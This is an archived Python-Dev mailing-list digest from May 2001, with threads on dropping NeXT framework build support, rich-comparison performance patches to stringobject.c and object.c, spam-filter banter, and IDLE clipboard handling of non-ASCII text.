From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Mon, 14 May 2001 13:04:56 -0400 (EDT)
Subject: [Python-Dev] deprecated platforms
Message-ID: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>

Jack asked me about:

https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470

which concerns removing the support for --with-next-framework from 
the build procedure. 

I'm all for removing it: 
 it's broken for OSX,
 if it worked, it doesn't do the whole job ( I think framework 
   support should eventually be added for OSX with a separate
   post-build script -- a real framework should encapsulate 
   all of the python libs, docs and headers files in one bundle. ) 
 nobody seems to know if it still works on Next or OpenStep.

 However, I said I thought there ought to be some sort of official
procedure for removing platform support. 
 
 This doesn't seem to be addressed in either PEP 4 (Deprecation
of Standard Modules) or PEP 5 (Guidelines for Language Evolution).

 I don't think it needs to be as involved a process as PEP 4 or 5 --
it's a more reversable decision than removing a feature from the
language.  Although, removing a platform dependent feature -- 
like in the long discussion about case sensitivity -- may be a 
bigger deal. 
 But I'm really thinking more about things like the Next case -- 
where there are build options and #ifdefs that, as far as we know,
haven't been tested in several versions. ( Believe it or not, there
are still folks hanging dearly onto their black NeXT cubes, and finding
the useful -- but I have no idea if any of them are using Python, 
and there's lots of users out there whom we only hear from when they
discover a problem. ) 

 Perhaps there should be some sort of "Last Call for Platform Saviour" :
if nobody steps forward who is willing to do test builds on that 
platform, support may be removed if maintaining it is getting in the way. 
 

 Any thougts or opinions on this? 

 Are there any other platforms where this might become an issue ? 
 If this looks like it's unlikely to crop up again, then maybe we
  don't need to bother with a 'policy'. 

 What about support for particular compilers and build environments: 
 (Borland C on Windows and MPW on Mac are two examples of "minority" 
   compilers.) 


BTW: As I've though more about this particular issue (--with-next-framework) 
 I don't think it's as big an issue -- removing that switch isn't going
 to break the build entirely (I think!). Pulling out all of the 
 #ifdefs for Next would be a larger issue, but that hasn't been proposed
 (yet). If the consensus is that this isn't a big enough issue, in general,
 to need an official policy, then I vote to pull it out and see if anyone
 screams. 

 
-- Steve Majewski


From guido at digicool.com  Mon May 14 22:53:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 15:53:26 -0500
Subject: [Python-Dev] deprecated platforms
In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
             <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com>

I can't really add much to this discussion, since I have *absolutely*
*no* *idea* what kind of framework we're talking about here...

I agree with Steve that we shouldn't be too scared of removing support
for obsolete platforms.  People hanging on to obsolete platforms may
as well hang on to obsolete Python versions...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 21:40:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 21:40:21 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com>
Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>

> Okay, so I'm completed confused now.  I extended the definition of
> ECTypeType to include this after the doc string slot:
> 
>       (traverseproc)0,              /* tp_traverse */
>       (inquiry)0,                   /* tp_clear */
>       (richcmpfunc)0,               /* rich comparisons */
>       0L,                           /* weak reference enabler */
> 
>     #ifdef COUNT_ALLOCS
>       /* these must be last */
>       0,                            /* tp_alloc */
>       0,                            /* tp_free */
>       0,                            /* tp_maxalloc */
>       (struct _typeobject *)0,      /* tp_next */
>     #endif

Why did you do that? ECTypeType has the right data type
(PyTypeObject). It is the instances of PyExtensionClass that are
troubling

> When I looked at the definition of ECType, after the doc string I saw
> 
>       METHOD_CHAIN(ExtensionClass_methods)
> 
> as Martin indicated.  I can't simply insert the same zeroes at the end of
> the ECType def'n as I did at the end of the ECTypeType definition.  

Of course not. ECType is of type PyExtensionClass, not of type
PyTypeObject. Those are similar, but not equal.

> Where does this METHOD_CHAIN thing go?  I looked at the def'n of
> struct _typeobject in Include/object.h but didn't see a slot that
> looked suitable.

Just have a look at ExtensionClass.h instead.

> FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
> I get 
> 
>     Fatal Python error: UNREF invalid object
> 
> when I run my failing script.  This is with and without making any changes
> to ECType or ECTypeType.

BTW, what version of PyGtk did you try to compile? I've tried the
0.7.0-dont-use, and it can run examples/testgtk without major problems
(the example did need some updates, since it is apparently outdated).
My Gtk version was 1.2, on Linux.

In any case, I think you need to analyse this in a debugger.

Regards,
Martin


From tim at digicool.com  Mon May 14 22:12:44 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 16:12:44 -0400
Subject: [Python-Dev] Comparison speed
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>

Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107
0.106
0.109
0.106
0.106
0.106
0.106
0.106
0.105
0.106

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118
0.118
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

C:\Code\python\dist\src\PCbuild>python timech.py
0.119
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%.
string_compare hasn't changed, so rich comparisons are a good guess.  Note
that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070
0.069
0.069
0.070
0.069
0.069
0.069
0.070
0.069
0.069

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076
0.076
0.076
0.076
0.076
0.077
0.076
0.076
0.076
0.076

C:\Code\python\dist\src\PCbuild>python timech.py
0.069
0.070
0.070
0.069
0.069
0.070
0.070
0.069
0.070
0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out
the comparison slowdown.

If we try it with a type of comparison that avoids the richcmp machinery
(int < int is special-cased in ceval), current CVS is actually faster than
2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056
0.056
0.056
0.056
0.055
0.056
0.058
0.058
0.055
0.056

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059
0.059
0.059
0.060
0.060
0.059
0.059
0.060
0.059
0.059

C:\Code\python\dist\src\PCbuild>python timech.py
0.053
0.052
0.052
0.053
0.053
0.052
0.052
0.054
0.052
0.053

C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason
other than richcmps.

These were all done on a Win2K box; timings vary too much on a Win9x box to
be useful.

Anybody care to take a stab at making the new richcmp and/or coerce code
ugly again?

speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 22:34:35 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 22:34:35 +0200
Subject: [Python-Dev] deprecated platforms
Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de>

> I'm all for removing it:

So am I. There are way too many build options for build Python on the
Mac-like systems already (e.g. after that change, you still have
--with-dyld - or rather the option of still building .o extensions).

If it is clearly broken (even if only on OSX), it should be
removed. Anybody interested in the flag would need to make it work
correctly before it can be revived.

> However, I said I thought there ought to be some sort of official
> procedure for removing platform support. 

I don't think such a procedure is necessary. It is not that any end
user would be concerned; building Python is an activity of system
administrators. The other PEPs are there because changing the language
or removing modules might break *applications* that used to work after
an upgrade of Python. With removed platform support, nothing will
break - installations would continue to use the last release that did
support that platform.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 00:06:57 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 00:06:57 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

When stepping through the code, I also missed support for the
relationship between identity and equality. E.g. in
PyObject_RichCompare, I'd expect

  if (v == w) {
     switch (op)
     case Py_EQ:case Py_LE:case Py_GE:
        Py_INCREF(Py_True);
        return Py_True;
     case Py_NE:case Py_LT:case Py_GT:
        Py_INCREF(Py_False);
        return Py_False;
     }
  }

That would not help in your case, of course. I don't even know how
frequent comparing identical objects is in real life - but this is
something that PyObject_Compare has that PyObject_RichCompare
currently doesn't.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 23:55:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 23:55:39 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

Hi Tim,

With CVS Python, 1000000 iterations, and a for loop, I currently got

0.780
0.770
0.770
0.780
0.770
0.770
0.770
0.780
0.770
0.770

With the patch below, I get

0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720
0.710
0.710

The idea is to let strings support richcmp; this also allows some
optimization for the EQ case.

Please let me know what you think.

Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c	2001/05/10 00:32:57	2.115
+++ stringobject.c	2001/05/14 21:36:36
@@ -596,6 +596,51 @@
 	return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also.  */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+	int c;
+	PyObject *result;
+	if (!PyString_Check(b)) {
+		result = Py_NotImplemented;
+		goto out;
+	}
+	if (op == Py_EQ) {
+		if (a->ob_size != b->ob_size) {
+			result = Py_False;
+			goto out;
+		}
+#ifdef CACHE_HASH
+		if (a->ob_shash != b->ob_shash
+		    && a->ob_shash != -1 
+		    && b->ob_shash != -1) {
+			result = Py_False;
+			goto out;
+		}
+#endif
+	}
+	c = string_compare(a, b);
+	switch (op) {
+	case Py_LT: c = c <  0; break;
+	case Py_LE: c = c <= 0; break;
+	case Py_EQ: c = c == 0; break;
+	case Py_NE: c = c != 0; break;
+	case Py_GT: c = c >  0; break;
+	case Py_GE: c = c >= 0; break;
+	default:
+		result = Py_NotImplemented;
+		goto out;
+	}
+	result = c ? Py_True : Py_False;
+  out:
+	Py_INCREF(result);
+	return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
 	&string_as_buffer,	/*tp_as_buffer*/
 	Py_TPFLAGS_DEFAULT,	/*tp_flags*/
 	0,		/*tp_doc*/
+	0,		/*tp_traverse*/
+	0,		/*tp_clear*/
+	(richcmpfunc)string_richcompare,	/*tp_richcompare*/
+	0,		/*tp_weaklistoffset*/
+	0,		/*tp_iter*/
+	0,		/*tp_iternext*/
 };
 
 void


From gstein at lyra.org  Tue May 15 00:17:56 2001
From: gstein at lyra.org (Greg Stein)
Date: Mon, 14 May 2001 15:17:56 -0700
Subject: [Python-Dev] Comparison speed
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
Message-ID: <20010514151755.P1374@lyra.org>

On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote:
>...
> Anybody care to take a stab at making the new richcmp and/or coerce code
> ugly again?
> 
> speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim

Euh... isn't Guido's preference for cleanliness over speed?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From tim at digicool.com  Tue May 15 00:35:33 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 18:35:33 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010514151755.P1374@lyra.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIGCAAA.tim@digicool.com>

[Greg Stein]
> Euh... isn't Guido's preference for cleanliness over speed?

So do both.


From greg at cosc.canterbury.ac.nz  Tue May 15 03:42:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 15 May 2001 13:42:49 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>:

> I also missed support for the
> relationship between identity and equality.

That would severely restrict the semantics that could be given
to the comparison operators by overloading them.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Tue May 15 04:40:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 21:40:33 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST."
             <20010514151755.P1374@lyra.org> 
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>  
            <20010514151755.P1374@lyra.org> 
Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com>

> > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim
> 
> Euh... isn't Guido's preference for cleanliness over speed?

Yeah, Tim & I have developed a nice good-cop-bad-cop routine about
this. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 15 05:36:42 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:36:42 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> When stepping through the code, I also missed support for the
> relationship between identity and equality. E.g. in
> PyObject_RichCompare, I'd expect
>
>   if (v == w) {
>      switch (op)
>      case Py_EQ:case Py_LE:case Py_GE:
>         Py_INCREF(Py_True);
>         return Py_True;
>      case Py_NE:case Py_LT:case Py_GT:
>         Py_INCREF(Py_False);
>         return Py_False;
>      }
>   }
>
> That would not help in your case, of course. I don't even know how
> frequent comparing identical objects is in real life - but this is
> something that PyObject_Compare has that PyObject_RichCompare
> currently doesn't.

Guido insisted (with cause <wink>) on these four pairs as being equivalent:

    x <  y  iff  y >  x
    x <= y       y >= x
    x == y       y == x
    x != y       y != x

but beyond that, in the presence of rich comparisons, agreed not to make any
other assumptions about what those pixel-bags "mean".  In particular, there's
no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies
"x != y", etc.

Applying that to the above leaves you with nothing but

   if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

	if (v == w)
		return 0;

assumes too.  So I don't see much future in that.

[later, a patch to fill in the richcmp slot for strings]
> +static PyObject*
> +string_richcompare(PyStringObject *a, PyStringObject *b, int op)
> +{
> +	int c;
> +	PyObject *result;
> +	if (!PyString_Check(b)) {
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	if (op == Py_EQ) {
> +		if (a->ob_size != b->ob_size) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#ifdef CACHE_HASH
> +		if (a->ob_shash != b->ob_shash
> +		    && a->ob_shash != -1
> +		    && b->ob_shash != -1) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#endif
> +	}
> +	c = string_compare(a, b);
> +	switch (op) {
> +	case Py_LT: c = c <  0; break;
> +	case Py_LE: c = c <= 0; break;
> +	case Py_EQ: c = c == 0; break;
> +	case Py_NE: c = c != 0; break;
> +	case Py_GT: c = c >  0; break;
> +	case Py_GE: c = c >= 0; break;
> +	default:
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	result = c ? Py_True : Py_False;
> +  out:
> +	Py_INCREF(result);
> +	return result;

[and that yields about an 8% speedup in the "<" case]

That looks on the right track, but maybe at the wrong level:  why is it
necessary?  That is, the bulk of the "smarts" here in the switch stmt are
type-independent:  if there's no specific implementation of individual
comparisons, but there is a tp_compare, then the switch stmt applies verbatim
to *any* such type.  Do we have to fill in the richcmp slot for everything to
get Python to realize that?  I mean "just about everything", too:  while,
e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min
etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then,
but thru the general comparison routines).

The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+   which calls PyObject_RichCompare()
+     which calls do_richcmp()
+       which calls try_rich_compare() (unsuccessfully now,
                                        successfully after your patch)
          which fails to find a richcmp slot on either operand (now)
          so says "not implemented"
+       then calls try_3way_to_rich_compare()
+         which calls try_3way_compare()
+            which finally calls the tp_compare slot
+            then runs exactly the same
   		switch (op) {
		case Py_LT: c = c <  0; break;
		case Py_LE: c = c <= 0; break;
		case Py_EQ: c = c == 0; break;
		case Py_NE: c = c != 0; break;
		case Py_GT: c = c >  0; break;
		case Py_GE: c = c >= 0; break;
		}
        	result = c ? Py_True : Py_False;
             switch as your patch

and things unwind.  So we've got 7 function calls there, not even counting
calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine
instructions that actually do the compare <wink>.

You got an 8% speedup for one type by tricking the switch stmt into appearing
3 calls earlier.  What if the implementation were smarter, and did it for
*all* relevant types even a call or two before that?

I don't see any reason "in principle" that compares couldn't be much faster,
and via the usual gimmicks:  bigger, smarter functions that remember what
they've already determined so don't need to figure it out over and over
again, and fast paths to favor common cases at the expense of comparisons
from Mars.  One thing to note here:  the workhorse comparisons are "like
strings" in having no *logical* need for richcmps at all; and the objects for
which richcmps were introduced were numerical arrays, which can much better
afford a longer code path to *find* them (one matrix compare will trigger
many vanilla element compares anyway, so even for arrays it's much more
important that the *latter* be fast).  The code now is approximately
backwards in that respect (it takes gobs of work before we even *look* for a
cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're
doing an explict "cmp" compare, the code now tries to *simulate* cmp first
via a long sequence of richcmp calls!).

I don't have time to uglify this code, but Python would benefit from it.

and-no-matter-what-guido-may-say<wink>-ly y'rs  - tim


From tim.one at home.com  Tue May 15 05:50:00 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:50:00 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>

[Guido]
> Index: spam.c
> ...

Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
with "spam" in the subject line, and my mail reader moves that to a special
spam folder upon delivery.  So far this is the one and only incoming email
it's moved.  Many solicitations to help foreign nationals move large sums of
money out of their country have gotten through, along with a number of
intriguing promises that I can easily increase the size of my penis -- like I
have any need for either of those <wink>.

reads-every-spam-he-gets-top-to-bottom-ly y'rs  - tim


From esr at thyrsus.com  Tue May 15 05:53:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 23:53:38 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400
References: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <20010514235338.C663@thyrsus.com>

Tim Peters <tim.one at home.com>:
>              Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through, along with a number of
> intriguing promises that I can easily increase the size of my penis -- like I
> have any need for either of those <wink>.

What we should truly fear is the prospect that you might increase the size
of your <wink>.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The state calls its own violence `law', but that of the individual `crime'"
	-- Max Stirner


From uche.ogbuji at fourthought.com  Tue May 15 06:26:31 2001
From: uche.ogbuji at fourthought.com (Uche Ogbuji)
Date: Mon, 14 May 2001 22:26:31 -0600
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules 
 spam.c,1.1.2.3,1.1.2.4
In-Reply-To: Message from "Tim Peters" <tim.one@home.com> 
   of "Mon, 14 May 2001 23:50:00 EDT." <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com> 
Message-ID: <200105150426.f4F4QVx01531@localhost.local>

> [Guido]
> > Index: spam.c
> > ...
> 
> Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
> with "spam" in the subject line, and my mail reader moves that to a special
> spam folder upon delivery.  So far this is the one and only incoming email
> it's moved.  Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through [...]

I thought I was th only one getting all these silly Nigerian scam spams.  I 
figured maybe they saw my name and decided to test on me (though they might 
more cleverly have figured that a fellow Nigerian would be wise to the game).

However, with the (sloppily) bogus headers I've always found on those things, 
I'm surprised your ISP couldn't sniff them out.

Not that it matters.  The Eastern Nigerian proverb gets it right.

"Once hunters learn to shoot without missing, birds will learn to fly without 
resting".


-- 
Uche Ogbuji                               Principal Consultant
uche.ogbuji at fourthought.com               +1 303 583 9900 x 101
Fourthought, Inc.                         http://Fourthought.com 
4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Tue May 15 08:28:34 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 02:28:34 -0400
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEEKCAA.tim.one@home.com>

[Guido]
> Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

[Martin]
> Perhaps the Tcl version? That sounds like the issue that Marc talked
> about: Tk behaves differently when text is entered programmatically
> (and perhaps through cut-n-paste), as compared to text entered through
> the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
> Solaris 8 still gives me the UnicodeError.

I don't know which version of Python Guido used.  I tried cut-&-paste of

    s='??'

from his email into the distributed 2.1 IDLE under Win98, and got

    UnicodeError: ASCII encoding error: ordinal not in range(128)

Tk appears to interfere with using the usual Windows ALT+0nnn method of
entering funny characters, so unsure what happens then -- but for me it
either works fine or does something insane (moves the cursor to the left
margin, brings up an IDLE dialog box, etc).

If I open the system Character Map utility and copy-&-paste using *that*, I
can enter all sorts of stuff without problem:

>>> s = "?????????????????????????????????"
>>> s
'\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
>>>

So not all clipboard entries are created equal.

Another clue:  if I paste the s='??' snippet from Guido's email into a file
opened with Notepad, then immediately copy it again from the Notepad doc,
then paste that into Idle, again no problem:

>>> s='??'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from
Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODTEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk
grabs an unfortunate data format (when present) from the clipboard in
preference to a fortunate one.

the-clipboard-is-a-complex-beast-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 08:44:23 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 08:44:23 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>

> Applying that to the above leaves you with nothing but
> 
>    if (v == w && op == Py_EQ) /* then return Py_True */
> 
> [...] So I don't see much future in that.

Is this really exactly what Python would guarantee? I'm surprised that
x==x would always be true, but x!=x might be true also. In a type where
x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
I had expected that you'd reduced it to

  if (v == w && op == Py_EQ) /* then return Py_True */
  if (v == w && op == Py_NE) /* then return Py_False */

The one application where this may help is list_contains, in
particular when searching a list of interned strings.

> You got an 8% speedup for one type by tricking the switch stmt into
> appearing 3 calls earlier.  What if the implementation were smarter,
> and did it for *all* relevant types even a call or two before that?

Please have a look at the patch below. Since I made a CVS update since
yesterday, I had to readjust the baseline results:

0.790
0.780
0.770
0.780
0.780
0.790
0.780
0.790
0.790
0.790

The patch moves the case "equal types, supporting cmp" to somewhat
earlier, just after the attempt to do richcompare. Now I get

0.760
0.770
0.750
0.770
0.750
0.750
0.760
0.760
0.760
0.760

So while there is some saving, this is not as good as implementing
richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal
types, implementing tp_compare" before the case "one of them
implements tp_richcompare" without changing the semantics. 

The change here is what you'd do when you have both richcmp and
oldcomp; Python clearly mandates using richcmp. In case this is not
obvious (it wasn't to me): UserList will complain about using the
deprecated __cmp__, and dictionaries will iterate over their elements
differently.

Given that richcomp has to be tried first, this patch does the "common
case" at the earliest possible time, and with no overhead, except for
PyErr_Occurred call.

So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT
TP_RICHCOMPARE (sorry for shouting). If you think the extra work for
type implementors is not acceptable, we can offer a convenience
function that everybody implementing tp_compare can put into
tp_richcompare. For strings, I would still special-case
tp_richcompare: when tracing calls to string_richcompare, I found that
most calls with Py_EQ can be decided by checking that the string
lengths are not equal. This is all "bigger, faster functions" put to
work.

Regards,
Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c	2001/05/11 03:36:45	2.131
+++ object.c	2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c <  0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+	
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
 
+
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc. 
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
